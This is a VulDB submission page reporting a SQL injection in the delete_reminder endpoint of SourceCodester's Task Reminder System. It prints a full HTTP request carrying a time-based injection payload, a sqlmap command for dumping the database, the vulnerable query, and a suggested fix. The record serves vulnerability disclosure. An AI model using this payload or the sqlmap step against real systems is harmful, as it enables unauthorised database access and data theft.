जमा करें #228610: SourceCodester Task Management System sql injection in Master.phpजानकारी

शीर्षक	SourceCodester Task Management System sql injection in Master.php
विवरण	I find a SQL injection vulnerability in the SourceCodester Task Management System(https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html) This affect the file /php-trs/classes/Master.php?f=delete_reminder: POST /php-trs/classes/Master.php?f=delete_reminder HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/php-trs/admin/?page=reminders/manage_reminder&id=6 Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=v50trgss5tkq84rfr78hjj7g1h Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin user_id=1&title=1&description=1&remind_from=0011-01-01&remind_to=0222-01-01&status=1&id=1'and sleep(4)# Then you will feel that the server's response time has obviously become longer, and this proves that our sql statement was successfully executed. Then you can save the request package as 1.txt, and then use sqlmap to inject it. The command is "sqlmap -r 1.txt --data="id=1", and then you can successfully drag the library The vulnerability arises from the usage of the code "UPDATE `reminder_list` set {$data} where id = '{$id}'" without implementing sufficient filtering on the controllable parameter id. This lack of proper filtering exposes the potential for SQL injection attacks. To address this issue, my recommendation is to protect the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
स्रोत	⚠️ https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
उपयोगकर्ता	fushuling (UID 45488)
सबमिशन	26/10/2023 07:01 PM (3 साल पहले)
संयम	26/10/2023 08:21 PM (1 hour later)
स्थिति	स्वीकृत
VulDB प्रविष्टि	243644 [SourceCodester Task Reminder System 1.0 Master.php?f=delete_reminder पहचान SQL इंजेक्शन]
अंक	20

◂ पिछला सिंहावलोकन अगला ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!